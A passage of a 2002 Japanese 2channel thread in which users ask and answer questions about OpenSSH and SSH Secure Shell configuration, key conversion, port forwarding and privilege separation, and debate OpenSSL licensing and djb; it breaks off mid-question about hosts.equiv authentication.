263 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 18:42
>>260
OS は何?

264 名前:260 投稿日:02/09/26 19:39
>>261
正しい記述の方法をご教授頂けますと深甚です。

>>263
RedHat Linux 6.2 です。

265 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 19:45
>>264
OpenSSHに変えて、sshd -e 2> LOGFILE で解決しる

266 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 20:06
>>264
なぜ man を調べようとしない?

267 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/26 23:13
>256
logging を on にして、詳細をみてみるとか

268 名前:名無しさん@お腹いっぱい。 投稿日:02/09/27 10:37
>>155 のやり方で OpenSSH で生成した SSH2プロトコル用の鍵(公開鍵および秘密鍵、念のためDSA および RSA どっちも)を SSH Communications Security Corp の SSH Secure Shell で使うべく変換しました。
で SSH Secure Shell からインポートしたら確かにインポートされました。
鍵一覧表示には 「1024-bit DSA, converted from OpenSSH by ore@orenohost」 と表示されています。
が、これを使って認証ができません。また、秘密鍵のパスフレーズの変更もできないようです。
もちろん SSH Secure Shell 自身で作った鍵なら認証もパスフレーズの変更もできます。
やはり OpenSSH と SSH Secure Shell の間での鍵の共有はできないのでしょうか?

OpenSSH は Cygwin 上のものと Debian GNU/Linux のものを試してみました。

269 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 10:39
ところで SSH の呼称ですが、
プロトコル自体を表す場合は SecSH
SSH Communications Security 社のクライアントを表す場合は SSH Secure Shell
オープンソースのクライアントを表す場合は OpenSSH
ということでいいんでしょうか?

270 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 10:48
>>269
> オープンソースのクライアントを表す場合は OpenSSH
OpenSSH はサーバも含むし、
OpenSSH 以外にも open source の SSH ソフトウェアはある。

271 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 10:52
>>270
そ、そですね。じぶんも OpenSSH の sshd 使ってながら…
PuTTY などもソースコード公開されてますしね。

272 名前:268 投稿日:02/09/27 12:30
なんか勘違いしていたようです。
秘密鍵は変換できないんですね。

ssh-keygen -e -f id_dsa

の出力を良く見ると

---- BEGIN SSH2 PUBLIC KEY ----

で始まってる・・・異なるクライアントなんだから、秘密鍵は作り直せってことですね。

273 名前:名無しさん@お腹いっぱい。 投稿日:02/09/27 12:58
さらばOpenSSLなのか。。。

OpenBSDって、やること極端ね


274 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 13:12
TheoSSL の発表はいつですか(w

275 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 13:14
>>273
どういうこと?

276 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 13:54
OpenSSH 3.5 がそろそろ出るよn.

277 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:02/09/27 15:15
>>275
http://marc.theaimsgroup.com/?l=openbsd-misc&m=103280816316720&w=2


278 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 15:46
>>277
フリーを保つという姿勢は立派だが、最後の二行で喧嘩売りすぎ。Theo 節が
冴え渡っとるな。

279 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 15:49
いやぁ、まぁ潔癖をつらぬくためにはソレくらいの喧嘩腰でないとだめかも試練。
俺的には、消して極端とは思えない。

潔癖症といえば、 Debian も潔癖症だね。

280 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 15:49
>>279 ごめん、誤字多すぎた。

281 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 15:53
>>277
> the licence on the new code basically builds a contract that says "if
> you use this code, you cannot sue Sun".
このライセンスの原文ってどこにあるの?

訴訟を起こせないといっても要するにBSD ライセンスや MIT ライセンスの
責任放棄の表明と変わらんような気もするんだが。(THIS SOFTWARE IS
PROVIDED "AS IS" ... 以下ね)

282 名前:名無しさん@お腹いっぱい。 投稿日:02/09/27 16:03
Debian の ML でも出た話題。
http://lists.debian.org/debian-legal/2002/debian-legal-200209/msg00183.html
結論、non-free になる。

Debian は徹底した「フリー」主義だからなぁ。
Scial Contract (憲章?) http://www.debian.org/social_contract
What Does Free Mean? http://www.debian.org/intro/free

ライセンスの問題とは関係ないけど、 CNET の記事。
http://msnbc-cnet.com.com/2100-1001-958679.html?type=pt&part=msnbc&tag=alert&form=feed&subj=cnetnews


283 名前:281 メール:sage 投稿日:02/09/27 16:04
これか。
http://marc.theaimsgroup.com/?l=cryptography&m=103253111420211&w=2

284 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 16:12
>>282
non-free だからといってメンテされないわけではない。
モノによるが。

参考: BOF 報告
http://pc.2ch.net/test/read.cgi/linux/1030178687/764
http://pc.2ch.net/test/read.cgi/linux/1030178687/808

285 名前:281 メール:sage 投稿日:02/09/27 16:15
>>283
確かに ECC のコードに関しては、従来の OpenSSL のライセンスよりもかなり
キツいね。

ただ、そのライセンスは ECC 使う場合にのみ関係してくる話で OpenSSL の内、
OpenSSH が利用している部分には無関係だから、神経質になる必要はないと
思うけどな。GPL と違って「混ぜるな危険」という性質のライセンスでもないし。

もちろん Debian が OpenSSL を non-free と分類するのは正しいし、それは
一貫性のある見識。でも BSD ライセンスを採用している OpenBSD でそこに
拘るのは違うような気がする。

286 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 20:00
>>269
>ところで SSH の呼称ですが、
>プロトコル自体を表す場合は SecSH

「セクーシュ」?


287 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 22:35
>>286
そのつづりで長音が入るとは、どこの訛りだ?

288 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 22:43
2ちゃんねる

289 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/27 23:05
●っ●●→●●ー●のパターンですな
マタ-リ
セク-ス
などなど


290 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 00:03
●●ー●ニヤリ

291 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 00:30
http://cr.yp.to/djbssh.html
もうすぐ



出してくれないかなぁ・・・

292 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 01:24
djbがSSHなどという複雑怪奇なプロトコルを実装するとはとても思えない。
やるとしたらまったく別の、もっと単純なプロトコルで、
暗号化と認証とインタフェイスをべつべつのプログラムに分けるだろう。
そしてたぶん最初は windows クライアントがなくて、使えねー、ということに
なると思う。まあやんないと思うけど。

>>291は「djbなら安全」とかいう知識をどっかから聞きかじってきただけで、
どうせdjb関連のツールなんてろくに使ったことないでしょ。
djbも名前が一人あるきしてるな。

293 名前:名無しさん@Meadow 投稿日:02/09/28 02:25
学者としてのdjbの専門はいちおー暗号なわけだから、
sshに使うかどうかは別として、ライブラリぐらいなら作っても不思議はないと思われ。

つーか、ネタにマジレス以下略。オレモナー。

294 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 02:46
>292
>SSHなどという複雑怪奇なプロトコル
SSH自体は全く複雑でも奇怪でもないと思うが。
複雑なのは、それを実装しているプログラムかと。
それこそdjbの思想の出番でそ。djb自身は動きそうに無いけど。

てか、ネタにm(略

295 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 03:41
>SSH自体は全く複雑でも奇怪でもないと思うが。

互換性がないバージョンが2つあるのは十分複雑だと思うが。
SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

>学者としてのdjbの専門はいちおー暗号なわけだから、

例の訴訟に勝つまでは暗号関係のプログラムは公開しないんじゃないかなあ。


296 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 06:15
>>295 しかし RFC822 はもはや変更しようがないし。

297 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 11:05
>>291
みんなが騒ぐから……
ttp://djbsshd.qmail.jp/why-not.html


298 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 14:31
しつこいがきんちょだなあ
面白くないっつの

299 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 15:55
djb 厨は妄想癖が強い割に想像力が貧困な香具師ばかりだな。氏ねや。

300 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 23:37
FreeBSDにOpenSSHを入れようとしてみました。
すると、./configureとmakeまでは何にも問題ないようでしたが、
make installしたら、
id: sshd: no suth user
WARNING: Privilege separation user "sshd" does not exist
って出て止まりますた。
sshdユーザが必要だったんですか?まったく気づきませんでした。
このユーザは名前がsshdなら何でも良いのでふか?
特権分離ユーザ・・・?ってなに?素人丸出しでスマソ。

301 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 23:39
>>300
標準で入っている OpenSSH じゃ満足出来なく ports を使う事も拒むとは
よほどのパワーユーザ様なんですね。
尊敬しちゃいます。

302 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/28 23:41
>>295
> SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

# そもそも「プロトコル」であるSSH2と、mailの「フォーマット」を
# 定義しているRFC822とを比較するのはナンセンスだと思うが…

RFC822はその曖昧さが実装を面倒にさせている原因だろ。
おまけに、MIMEのような拡張があったり、RFCに厳密に準拠していない
agentの面倒もみなくちゃならなかったりするからな。

一方、SSH2(secsh)は記述量こそ大きいが、状態遷移は
非常に単純なプロトコルだし、Packetのフォーマットも
単純で厳密。
http://www.ietf.org/html.charters/secsh-charter.html

勉強がてらdsniffのsshmitmをSSH2に対応させたものを
作ってみたことがあるが、暗号化/復号部分をOpenSSLに
まかせれば、Transport LayerやAuthenticationの部分は
あっという間に作れてしまうぞ。

# 少なくともSSH2よりIMAP4の方が複雑だと思うな。

303 名前:名無しさん@お腹いっぱい。 投稿日:02/09/29 01:44
>>296
え゛?RFC2822は?


304 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 02:03
てゆーかRFCは定義じゃないんだが。
曖昧なのも当たり前。厨房かお前ら。


305 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 02:06
>302
djbはOpenSSLも信用しないだろうな(藁

306 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 08:17
>>305 あ、オレもopensslは信用してないよ。


307 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 09:29
opensshは信用してるわけ??

308 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 11:12
>>297
これ、原文はどこなんですか。最近の前里予さんはだいぶカドが取れた
感じがするけど、やっぱちょっとアレルギーがあるので。


309 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 12:03
(・∀・)ジサクジエンデシタ

310 名前:sage 投稿日:02/09/29 12:42
djbがssh実装して、theoと煽り合戦するとこみたい。金払うし。

311 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/29 15:26
面白くなって参りました!

312 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/09/30 23:27
>>311
おーい、皆んな緊張しちゃって面白くないこと書けなくなっちゃったぞ。


313 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/02 19:38
あの・・・・ sftp って初めて知った。
名前だけは知ってたけど、sslwrapper + ftp と思ってた。
逝ってヨシ?

314 名前:302 メール:sage 投稿日:02/10/02 23:48
>>305-306
OpenSSLを使うって言っても、暗号ライブラリの部分だけ。
(ソースでいうとcryptoディレクトリの下)
直接入出力に関わる部分じゃないし、そもそも暗号ライブラリって
アルゴリズムの塊だから、自分で実装しなおすメリットはあまりないかも。

# まあ、OpenSSLのSSL/TLS実装部分はごちゃごちゃしすぎて
# 信用できないってのには激しく同意。
# つーか、実際大穴があいていたし。
# http://www.cert.org/advisories/CA-2002-23.html

315 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/03 00:03
>314
djbは libc すら信用しない人ですから

316 名前:302 メール:sage 投稿日:02/10/03 00:20
>>315
> djbは libc すら信用しない人ですから
そうだった…スマソ

317 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/03 02:15
いいかげん djb 厨の妄想ネタは余所でやってくれよ。

318 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/03 08:14
>>317 ここらがいいかも。
http://pc.2ch.net/test/read.cgi/unix/1029619161/l50


319 名前: ◆XSSH/ryx32 メール:sage 投稿日:02/10/03 20:52
スレ汚し記念カキコ


320 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/06 02:19
>>315
> djbは libc すら信用しない人ですから
でもシステムコール (というかカーネル) は信用してるのね。

321 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/06 04:13
> でもシステムコール (というかカーネル) は信用してるのね。

信用できる部分をなるべくせばめる、ということでは。

322 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/06 04:54
UNI×系OSにおいてカーネルとの唯一のインターフェースであるシステムコールを否定したら何も残らないじゃん

つーかスレ違(略

323 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:02/10/06 13:45
djbBSD, djbLinux希望!!

324 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/06 14:02
>>323
余所でやれと言ってるだろ。氏ね。

325 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/06 14:43
これだからdjb厨房は…

326 名前:名無しさん@Emacs メール:sage 投稿日:02/10/08 17:46
ssh の ml 厨房が多いな

327 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/09 01:37
日本語の ssh の ML なんてあるんだ。

328 名前:名無しさん@お腹いっぱい。 投稿日:02/10/11 16:09
今日、OpenSSHとTTSSHを導入して、SSHバージン卒業たばっかなんで
優しくお願いしますね。

で、telnet止めてログインしてみたんだけど、鍵がなくてもアカウントとパス
ワードで入れるじゃないですか?

てっきり鍵セットがないと、ログインできなくなるんで安心なのかと思って
たんですが、違うんですかね?

カギのないホストからは、アカウントとパスワードが合っていても入れなく
はできないんでしょうか?



329 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/11 16:12
>>328
> カギのないホストからは、アカウントとパスワードが合っていても入れなく
> はできないんでしょうか?
できます。

330 名前:328 投稿日:02/10/11 16:18
>>329

それは、OpenSSH+TTSHでも可能なんですか?
良かったら、方法を教えてください。


331 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/11 16:24
>>330
man sshd_config

332 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/11 16:26
>>330
PasswordAuthentication no


333 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/11 16:28
>>332
甘やかすなよ。

334 名前:328 投稿日:02/10/11 16:39
>>331
>>332

sshd_config を設定して再起動したらできました。
ありがとうございました。


335 名前:328 投稿日:02/10/11 16:41
>>333

すいませんね。
今度,OpenSSHセキュリティ管理ガイド 買おうと思ってます。

#導入書には、sshd_config は触る必要ないって書いてありました

336 名前:名無しさん@Emacs メール:sage 投稿日:02/10/11 17:14
>>335
> #導入書には、sshd_config は触る必要ないって書いてありました

(゚Д゚)ハァ?

337 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/11 23:41
>>328
ChallengeResponseAuthentication no
も設定しておくべし。
http://home.jp.FreeBSD.org/cgi-bin/showmail/FreeBSD-users-jp/71239

338 名前:教えて君 メール:sage 投稿日:02/10/11 23:43
すみません。自分なりに調べてみたけれどわからなかったので、質問させてください。

OpenSSHからSSHにSSHエージェントをフォワードして使うことはできないのでしょうか?
もし何か方法があるなら教えて欲しいのですが。

339 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:02/10/12 00:23
普通にsshエージェントを動かすように設定すれば使えるよ

340 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 00:47
リモートマシンで
echo $SSH_AUTH_SOCK
とやって何やら表示されてればagent forwardingがきいている。

341 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 00:58
ADSL + DynamicDNS なホストに、slogin する度に、known_hosts が、
どんどん太っていくんで、困っているんだがなにかいい方法ない?

342 名前:338 メール:sage 投稿日:02/10/12 01:04
回答ありがとうございます>>339 >>340
リモートマシンで
echo $SSH_AUTH_SOCK
とすると、
Undefined variable
と表示されてしまいました。何かおかしいところがないか勉強しなおしながらやってみます。

343 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 01:40
>341
DDNS

344 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 01:58
>>338
>>339
>>340
http://www.first.tsukuba.ac.jp/~kiyotomo/aboutopenssh.html
詳しくないけど、こんなのがあるから
agent forwardingが効かない場合もあるんじゃないの?

345 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 02:10
>>341
おれのとこでは太っていかないなぁ。あれってIPアドレスで見てるのかな。ホスト名でみてるんじゃない?ちなみにおれは $HOME/.ssh/config に StrictHostKeyChecking yes って書いてる。

346 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 08:46
>>345
お、それでいけますた。サンクスコ。

347 名前:名無しさん@お腹いっぱい。 投稿日:02/10/12 11:14
SSHとは直接関係ないんですが、他に適当なスレが見当たらな
いので、質問させてもらいます。
自宅のTeratermでunix(Solaris)サーバにアクセスしてます。
1つのサーバは、emacs -nwもコンソールでも正常に日本語が
表示されますが、もう一つのサーバではコンソールは問題ない
のですが、emacs -nwでは、日本語表示が'????'になってしま
います。正常な方は.cshrcにLANG=jaとなっていて、異常な
方はLANG=japaneseとなっています。でもコンソールは問題
ないのでこれが原因とは思われません。.emacsは同じ記述で
す。何かお心当たりはありませんでしょうか。



348 名前:名無しさん@お腹いっぱい。 投稿日:02/10/12 12:30
表示がうまくいかないほうのサーバもLANG=jaにしたらどうなりますか?

349 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 13:26
>>349
レスありがとん。
.cshrcで'set LANG ja'にしてもだめでした。
実は正常に日本語表示できる方は、emacsではなくmuleでした。
日本語表示できないほうは、emacs20.6です。
.Xdefaultsは、-nwで起動するときは効いてこないのですよね。
.Xdefaultsには違いがあるんですが関係ないですよね。


350 名前:名無しさん@Meadow メール:sage 投稿日:02/10/12 13:34
set してどーする。setenv だろ。
つーか、ssh 関係ない。くだ質あたりに逝ってらっしゃい。

351 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 15:20
>347
~/.emacs の見直し
てか禿スレ違い

352 名前:名無しさん@お腹いっぱい。 投稿日:02/10/12 16:52
Soralis7 (Sparc)に OpenSSH 3.4p1をインストールしたんですが
sshd起動時に"特権分離と圧縮は使えない"みたいなメッセージが
でます。特権分離が有効になる条件は何でしょうか?
インストールは ./configure; make; make install
でやってます。

353 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/12 16:59
>>352
がいしゅつ過ぎ。
README.privsep 読め。

354 名前:名無しさん@お腹いっぱい。 投稿日:02/10/15 21:11
OpenSSH 3.5
http://www.openssh.com/

355 名前:名無しさん@お腹いっぱい。 投稿日:02/10/15 22:41
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

356 名前:名無しさん@お腹いっぱい。 投稿日:02/10/15 22:59
portableはまだか?

357 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/15 23:12
>>352
圧縮をやめよう

358 名前:名無しさん@お腹いっぱい。 投稿日:02/10/15 23:51
>>354
まだどこにもファイルねーじゃん

359 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/16 00:55
ホントダ

360 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/16 01:01
そして失われた信用は永遠に取り戻すことは出来なかったとさ。
めでたしめでたし。

361 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/16 01:04
cd src; cvs up usr.bin/ssh


362 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/16 11:12
3.5p1、ftp.openbsd.orgでダウソしますた

363 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/16 12:06
今回も毒入ってた?

364 名前:毒無し メール:sage 投稿日:02/10/16 12:46
- MD5 (openssh-3.5p1.tar.gz) = 42bd78508d208b55843c84dd54dea848
- MD5 (openssh-3.5.tgz) = 79fc225dbe0fe71ebb6910f449101d23

365 名前:名無しさん@Meadow メール:sage 投稿日:02/10/16 18:34
>>347 - >>351でお世話になったものですが、
TeraTerm上で、emacs -nwで日本語が化けていた原因が
分かりましたので一応報告させていただきます。
(set-terminal-coding-system 'euc-jp)
を入れたらOKとなりました。このサーバはこの前まで
私の机にあったので、直接サーバー機にログインしてやって
ましたので、これがなくても大丈夫だったのですた。
スレ汚しスマソ。


366 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:02/10/16 19:43
>>365
最初にチェックすべきとこだな、おまけにスレ違い、あほんだらが。

367 名前:365 メール:sage 投稿日:02/10/18 09:55
>>366
 (;´Д`)  スミマセンスミマセン
 (  八)
   〉 〉
許してくらさい




368 名前:さんざんガイシュツだが… メール:sage 投稿日:02/10/18 13:43
>>367
SSHについては
  http://www.unixuser.org/~haruyama/security/openssh/support/
の本読んどけ。ぜってー損はしないからな。

369 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/18 21:55
>>368
> ぜってー損はしないからな
主語は「貴方が」ですか?

370 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/19 04:49
煽りでないとして…

>>369
「少なくとも」私は読んでよかったと思ってます。

371 名前:名無しさん@お腹いっぱい。 投稿日:02/10/19 09:30
大学から家にsshでつなぎたいんです。
http://www.gcd.org/sengoku/docs/NikkeiLinux01-01/telnet.ja.html#COMMAND
ここ見てやってます。

ProxyCommandを指定すると、

・Linux(Vine)からは、とりあえずプロキシコマンドを読むところまでは行く(繋がらないけど)。

・Windows(2000)からTeraTermや本家SSH(?)で試すと、
/bin/sh: ~/.ssh/proxy-telnet: not found
ssh_exchange_identification: Connection closed by remote host
とでて終了します。(これは本家SSHの結果。TeraTermでも同じ意味の結果がでました)
何が原因でしょうか?

Unix初心者で大学の計算機の構成が良くわからないんですが、
とりあえず個々のPCにWindows2000とVineLinuxが入ってて、
WindowsからはTeraTermで学内のTelnetサーバかSSHサーバにログインして操作します。
本家SSHで試したのは、家からダイヤルアップPPPで学校に接続して学内SSHサーバにログインし、
そこから家に接続しかえそうとしたときです。

372 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/19 09:34
>>371
> 大学の計算機の構成が良くわからないんですが
おまえがわからないものが俺らにわかるはずが無い管理者に聞け。

373 名前:371 メール:sage 投稿日:02/10/19 09:39
>>372
似たような環境もたくさんありそうで、一般的な症状だったら
解決策がわかる人もいるかもしれないと思ったんですが。

374 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/19 10:50
>>373
んじゃ、似たような環境の人がくるまで根気良く待っててください。

375 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/19 16:29
/bin/sh: ~/.ssh/proxy-telnet: not found
これが全てだと思うのですが、ファイルあんの?

376 名前:371 投稿日:02/10/19 19:41
>>375
レスありがとうございます。

例えば、>>371のエラーが出た直後に
mule ~/.ssh/proxy-telnet
とすればちゃんとファイルが開きます。

377 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/19 19:50
>>376
あんたのログインシェルはbashかcshか知らんが、
/bin/shではチルダ使えんよ。絶対パスで指定スレ


378 名前:371 メール:sage 投稿日:02/10/19 20:13
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
大学のログインシェルがtcshだったからLinuxからはうまくいってたんですね!
絶対パスを指定したらTeraTermからプロキシコマンドまでは実行できました。
デフォルトのtcshしか使ったことなかったから知らなかったです…お恥ずかしい。
でも
mule ~/.ssh/proxy-telnet
でちゃんとファイルが開けたのがなぜかはわかってません。

>>377さんありがとうございました!


…さてやっとここからが本番か…

379 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:02/10/23 00:59
>…さてやっとここからが本番か…
この調子じゃ先が思いやられるのお。大学のみならず人生も…

380 名前:371 メール:sage 投稿日:02/10/23 07:21
>>379
おかげさまで目標達成しました。
次はファイルサーバ立てようと思います。

381 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/23 11:41
ネタだと言ってくれ。

382 名前:名無しさん@お腹いっぱい。 投稿日:02/10/23 13:53
ssh -f でバックグラウンドに移行したプロセスの pid を得る方法ってある?

vnc をポートフォワーディング使って vnc 終了させたらそのまま
フォーワディングしていた ssh プロセスも終了させたい

#!/bin/sh
ssh -2CNf -L 5900:192.168.0.1:5900 -l hoge remote.domain
vncviewer localhost
kill $PID

ここで PID が解からない!?
bash でも csh 系でもいいです。

383 名前:x 投稿日:02/10/23 14:04
これって本当か?

↓ ↓ ↓
http://www.dream-express-web.com/space-trust.htm


384 名前:名無しさん@Emacs メール:sage 投稿日:02/10/23 16:14
>>382
pgrep つかえや

385 名前:382 メール:sage 投稿日:02/10/23 17:03
>>384
Thanks :-) 結局 pkill にしますた
確実に forwarder プロセスを見つけようと思ったけど、
ローカルポート指定している時点でユニークに決まってるもんな。

386 名前:名無しさん@お腹いっぱい。 投稿日:02/10/23 18:04
openssh3.5が出ていたのでインストールしました。(FreeBSDです)
そのときopenssh3.1でport22が空いているサーバへ接続し
cvsupをしportsからopensshをインストール
その時点でtelnet localhost 22 とすると古いバージョンが出ますが
/usr/local/etc/rc.d/sshd.sh stop
/usr/local/etc/rc.d/sshd.sh start
と、すると
telnet localhost 22 SSH-1.99-OpenSSH_3.5
と、なり最新版の返事が返ってきました。
で、質問なのですがstopしたときに切れなかったのが謎です。
なんでしょうか?

387 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/23 18:32
>>386
stop のときに何をしているか見ましょう。
ちなみに、sshd は、ご主人プロセスだけを殺すことが可能です。


388 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/23 21:14
>> 382
リモートコマンドに「sleep 20」とか指定してssh起動すれば、
フォーワディング上のプロセスが終了した時にsshも自動で終了できたり。


389 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/23 23:16
>>386
前のプロセスが生きてただけだろ・・・

390 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/31 03:55
OpenSSHのマシンからSSH2のマシンを経由して
その先のOpenSSHのマシンにファイルを転送したいのですが
(できればSSH2のマシンに一時ファイルを作らずに)
なにかよい方法はありますでしょうか?


391 名前:名無しさん@XEmacs メール:sage 投稿日:02/10/31 13:26
>>390
> OpenSSHのマシンからSSH2のマシンを経由して
> その先のOpenSSHのマシンにファイルを転送したいのですが

“その先の OpenSSH のマシン”の port 22 をどっかの port に
LocalForward するようなオプション付けて OpenSSH のマシンか
ら SSH2 のマシンに slogin。

で、OpenSSH のマシンで

scp -P 'どっかの port' path1 localhost:path2 (なりなんなり)


392 名前:390 メール:sage 投稿日:02/10/31 15:22
>>391
どうもありがとうございます。できました。
ポートフォワーディングの使い方を知らないことが
もろばれになってしまった気がします。

わからないついでにもうひとつ聞きたいのですが、
間にあるSSH2のマシンが二つ(あるいはそれ以上)ある場合には
どのようにすればいいのでしょうか?

マシン1(OpenSSH)−マシン2(SSH2)−マシン3(SSH2)−マシン4(OpenSSH)
みたいな構成で、マシン1から4へファイルを転送したい場合です。

393 名前:名無しさん@XEmacs メール:sage 投稿日:02/10/31 18:51
>>392
> マシン1(OpenSSH)−マシン2(SSH2)−マシン3(SSH2)−マシン4(OpenSSH)
> みたいな構成で、マシン1から4へファイルを転送したい場合です。

マシン2→マシン3にsloginしてマシン4のport 22をマシン2にフォ
ワード。

で、マシン1からマシン2にフォワードされたポートへscp。

マシンが 5 台以上ある場合にもフォワードされたポートをさらにフォ
ワードしてやればいけるんじゃないかな。やったことはないけど。

SSH2 なら cipher=none が使えるから、多段になってもたぶん大丈夫。

あと重要なのは GatewayPorts を yes にしとく。see ssh2_config。

394 名前:390 メール:sage 投稿日:02/10/31 22:12
>>393
どうもありがとうございます
ためしに実験してみたらうまく動きました。
フォワードされたポートをさらにフォワードする
というのもやってみましたが成功しました。
本当にどうもありがとうございました

395 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/10/31 22:43
ttyrec -u
という解もある

ttp://namazu.org/~satoru/ttyrec/

396 名前:login:Penguin 投稿日:02/11/01 00:28
http://sshtools.sourceforge.net/ というのをはけーんしますた。
がいしゅつ?


397 名前:名無しさん@お腹いっぱい。 投稿日:02/11/13 16:02
NFS over SSHとか出来ませんか?

398 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/13 16:05
>>397
TCP ならできるんでないの?
使いものになるかは知らんが。

399 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/13 16:07
>>397
それ以前に RPC over ssh ができないといけない。

400 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/11/13 22:36
ssh を使わなければならないような回線で NFS して何かうれしいのか問い詰めたい

401 名前:春山征吾 ◆ok9Ggg6xsM メール:sage 投稿日:02/11/13 23:53
Secure NFS via SSH Tunnel
http://www.math.ualberta.ca/imaging/snfs/
というページがあります。自分で試したことはありません。

402 名前:名無しさん@お腹いっぱい。 投稿日:02/11/14 06:52
http://www.appgate.com/mindterm/

MindTermの内蔵Pluginの『FTP to SFTP bridge』ってのが既存のFTP
クライアントを使える点でかなりいいんだけど、起動するまでの手順が
めんどくさい。『FTP to SFTP bridge』専用のソフトがほしい。

あと、JavaだからUSBメモリ等で持ち運んだとしてもJRE入ってない
と出先で動かない・・・。

JAVA以外で同様の機能を実現してるソフトってどっかにない?

403 名前:名無しさん@お腹いっぱい。 投稿日:02/11/14 19:41
hosts.equivを使って認証させたいんですが、
/etc/ssh/sshd_configに

RhostsAuthentication yes

としても、アクセスするとパスワードを求められます。
クライアントでは/etc/ssh/ssh_configで
